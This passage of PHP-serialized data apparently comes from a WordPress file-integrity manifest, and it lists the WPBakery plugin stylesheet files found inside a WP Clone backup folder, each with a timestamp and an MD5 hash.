s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/ui/vc_ui-panel-preset.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"a3bf960c2757c8dcf9b8218c939efcdd";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/ui/vc_ui-panel-row-layout.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"f4e7cdc0df5f40fd5cc9ca388670b7e8";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/ui/vc_ui-panel-templates.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"ec30764d368abc6b94b327d60ca50e7d";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/ui/vc_ui-prompt.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"18f5c5fe3d4aa0d650282d730b14ae61";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/ui/vc_ui-tabs-line.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"3113428ec37736e99cd93e571fcdffaf";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_buttons.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"021c69513ecd819f119888eb99552665";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_fullscreen.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"700bb28fd9105b0e8770a8146296bae7";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_helper.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"13713f1192277293ea5a7ddb9930bd31";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_messages.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"cb095338b203901a8e08e19ec0391bc0";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_modals.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"78a9cee115bfd5a8b0cd137761b23f21";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_navbar.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"48ef8c6a845077b76b27f22fc77f78e4";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_panels.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"210bc9d96bf2c1c56539c4573669e34c";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_placeholder.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"c95c8771bef41dfa6a60ef9ba320ac03";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_preloader.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"85873d5e5797c0ce1f4334ab4d97b38f";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_switcher.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"e57aa40e21749032d369265f9893f7c5";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_table.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"3f0c95b5535c77ab7cf860fa75ab01ee";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_teaser_box.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"a7d14022378596e8c8485abb1a95d8df";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/modules/vc_welcome.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"5a8a751637b28362876f11b48ea336bf";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/pages/vc_welcome.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"f02a5ed9f57fe579d66e1102412d9fe8";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/autocomplete.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"10a0b09cd3b7ff0ace3773682401170e";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/colorpicker.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"1123df759a0b940e6c7cd1509251b23e";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/column_offset.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"5dc404f530ff17cbf1ac257939250073";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/css_editor.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"2daa38bf4e7ed4b9f12b766165f17568";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/dropdown.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"81fee7ce1a3283c5531e268c3996b9f0";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/hidden.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"1c7dd9fb792a881c8a51b274c6a19143";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/iconpicker.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"f9ef2a582e989eb54ab214718613695c";}s:102:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/loop.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"21a5626b5a36bcae25465fbc3d27263f";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/options_field.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"757ea069c56714a46e4288a5a6509beb";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/param_group.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"b9f221cef7c9dc5cc8b20b9228d998a8";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/sorted_list.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"a287a536fc40051736e83176527a7ac8";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"2c07a66d2761f5eadff95cf823c428dd";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_element.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"7984bb804beb88f96eb2b2682ae25512";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/navbar.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/preview.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"18f9b8f4da3708b5e82fd33581529cce";}s:145:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_animated_block.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"406af647ada9d80d13b6a1d7df30cfb6";}s:151:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_animated_block_admin.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"0fd82e61f2f10f3c193fa52f79bd7d85";}s:134:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_col.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"cbe12f049665afa35abdf4673846c7bb";}s:153:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_gitem_zone_height_mode.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"899bbb87f59657ea251e412ec88e1648";}s:146:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_post_categories.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"b0338dd5ceb885d465eef33d11b8e29b";}s:140:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_post_data.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"8c79cc7f07e26b73fc0de993b8691b0c";}s:134:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_row.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"76fe7f9e203a31b363867aba6119bfdc";}s:140:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_row_admin.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"3eb49af85ada6583e85424ccde0e0663";}s:135:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_zone.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"4ddad5cc827afc55dfba189d3cfa9274";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_zone_a.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"0d0ce987c726cf5b8bd62b9111a500f5";}s:141:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_zone_admin.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"33f9e0016aedb2e6a1c46a6c7540d42a";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_zone_b.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"a0a52f3c43c69b3940ed0b2133b50e58";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/shortcodes/vc_gitem_zone_c.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"286454ae644b758a42c0761eb5d107f8";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/vc_gitem_editor.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"a3d7d783e697f077db77d7c4ed93314a";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_grid_item/vc_grid_item.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"8f52ce1930a39edae6c9c1d1d967195f";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_link.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"86272c6988315f27c00a1d3ca4364ff9";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/params/vc_message_color.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"0bfefb23b5158c51f02b1d03084575ed";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/popups/modal_add_element.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"f961ab19167d03f12e0edfcbd096d8bf";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/popups/panel_edit_form.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"d05f5bd5b92df4cc1c143c407bc3e02a";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/popups/panel_template_library.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"cae6132506ba66320d2334019712486f";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/settings_tabs/automapper.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"ce7f7d184e9014373e36df120113c827";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/settings_tabs/custom_css.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"a696f1fa8aee976a7f64b5859c1eaddb";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/settings_tabs/design_options.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"8c9a67906349b23fd5176db66180a8e9";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/settings_tabs/element_css.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"92f7fd3ab14fe16e05fea2be01694a58";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/settings_tabs/general_settings.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"921a05e0facc0f59654ecfe41a653f1b";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/settings_tabs/product_license.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"ea5ab4f39f171d56c75e3549c88b855a";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/settings_tabs/tabs_ui.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"414d68ff729e85f4cb264a69013a7aae";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/settings_tabs/user-group.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"6cc857f96bef605bdaa1863ebd274499";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/settings_tabs/vc_roles.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"04c3c92b9785c301dacd7fca578268cc";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/_shortcodes_container.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"94b052df374686851c3a01c212eef2d6";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/frontend_vc_row.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"0a20e9bbf7aef654e91445fb28ef53a8";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/tta/vc_tta-colors.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"e5f7cd05bdce636b03b39ed0822979de";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/tta/vc_tta-core.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"6046e154c056c8ed91484cfc24f703d4";}s:128:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/tta/vc_tta-frontend-editor.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"31c9b693989c76c2cd9bec54950fc1ad";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/tta/vc_tta-icon-controls.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"ce300683ac4540d9cd3c1772fcc5e3b6";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/tta/vc_tta-mixins.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"1ebca56e13f2b0ecad9852335beb5f3f";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/tta/vc_tta-options.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"1261ac918b3c59565ff41979f8d077ca";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/tta/vc_tta-pagination.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"ad7f275bab5e46d318139e29546370a0";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/tta/vc_tta-variables.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"e9ca520770ce1a6f252afdc88c8c5067";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_alert.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"7d13f435c3f476a74f94328844aa4210";}s:145:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/filter_styles/filter_bordered.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"3f48fa6b45bdd96f7c78f0d303fad58d";}s:144:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/filter_styles/filter_default.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"636a86fb2254164054854b6362e6ac4c";}s:157:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/filter_styles/filter_default_less_rounded.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"f3b0c131b7bf91966b87db00916a37ff";}s:145:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/filter_styles/filter_dropdown.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"821bec57b93f4d43b8e69b208fcf11fd";}s:143:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/filter_styles/filter_filled.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"43f080555b43f68e9a9f27ad3661ec6f";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/vc_grid.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"0cd900e8b9091b7691621e4a1823bd40";}s:130:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/vc_grid_arrows.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"a04e7f2a6e6ddc7b639523b8a5bcb65f";}s:132:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/vc_grid_carousel.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"116ac1cdbac9932a13e255400bd3636e";}s:130:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/vc_grid_filter.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"9a7d214bfbeb520e1b8b4b07db244143";}s:127:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/vc_grid_gap.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"de3ff508d6247f1e6a3687ad5409dda2";}s:131:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/vc_grid_loading.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"8bfc63105a127ac87def01388d544a92";}s:139:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/vc_grid_pagination_dots.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"3a9c35caf3a78c94662065eb48c6538b";}s:142:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/vc_grid_pagination_numbers.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"d34af11dcd6875df737f8a365e972423";}s:129:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_basic_grid/vc_grid_style.less";a:2:{s:1:"d";i:1517159298;s:1:"h";s:32:"60a49f343dc28f5a1a0b2a95c90e32b7";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_button.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"ff2ca383f87a491941854d5d720bf784";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_button3.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"7aba557ab9bcf5fc1fe603edc5316c62";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_button3_editform.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"a73d93167e7ec5ad0cbab8808a7e8bea";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_call_to_action.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"7efa3e31767ccd06fe66c59ead9e06dc";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_call_to_action3.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"dd400c978747f36c33ef35775153a5c0";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_carousel.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"92f84b0c549f20a060a3aef6b45c97b8";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_charts.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"caff271b55a7a44eec349fc4dea7c98f";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_cta3_editform.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"e9d069271367b7bcf6125ec8357c805e";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_custom_heading.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"9e8c2353c6dac7a45ea4bee3dd44b6e2";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_flickr.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"27ccf7774c4038810d16ba7908f17644";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_google_maps.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"74c4665bc4ea8fd0dc82ff19dbeaed60";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_hoverbox.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"9807168da4207311fab6a315b5892360";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_icon_element.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"b1d652d7a32e06e57dc50ee25683a951";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_image_gallery.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"aab42045a1b113619216116085476d0c";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_message_box/vc_message_box_2.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"461dddc2671c668673a304d86b4229bd";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_message_box/vc_message_box_front.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"b4336b8d1b9fc7bac1c7aea1df371538";}s:138:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_message_box/vc_message_box_mixins.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"e21bcb7637a07e3da001db705cb66507";}s:141:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_message_box/vc_message_box_variables.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"37386ef095ef162cccfdf8717cf1d784";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_pagination.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"e1ba41cc68caa81981782976c1044866";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_pie.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"66fc346848cbebd757453904043d6adc";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_post_slider.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"5ca1dd907865f87741dcd0bae707dbac";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_progress_bar.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"895dfccf5da32b42611a110965373572";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_responsive.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"613dac1fbee3a8b9a94267630bb29cbf";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_row.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"761b513515fc896c3a9f5bb14f3b65e1";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_section.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"2791bdb52694569c4c09fb3f902c59f5";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_separator.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"d03b1b85f2e60a3dbd969a690b93a4d3";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_single_image.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"f15a60da53f1ad920bab0b1a6897d627";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_social_btns.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"aac4f155517e60c0fbf72f2454ef1317";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_tabs_tour_accordion.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"ebb7027f642a475e4d5717f26365f38f";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_teaser_grid.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"c4b0f539d7f49ca72f972587f8a436ef";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_toggle.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"385346422f437a12a590843cd7b5dc08";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_tta.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"28273092c1565111bbd61291b5048fe5";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_video_widget.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"fe514cc84521a85288939650b9d3928f";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_widgetised_column.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"f8e213d24158f7b8f899c9b6d0d51aa6";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_zigzag.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"d0aefe236ac819ee582ee4a2dc4dd58f";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/shortcodes/vc_zoom.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"9de197214d60d62ca2174bf1f1717f52";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/vc_lte_ie9.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"8b152ef2869568f7561f36ba8f4ad058";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/assets/less/vendor/contact_form_7.less";a:2:{s:1:"d";i:1517159299;s:1:"h";s:32:"6a530667d727fba94f3475f53e9b4a26";}s:110:"w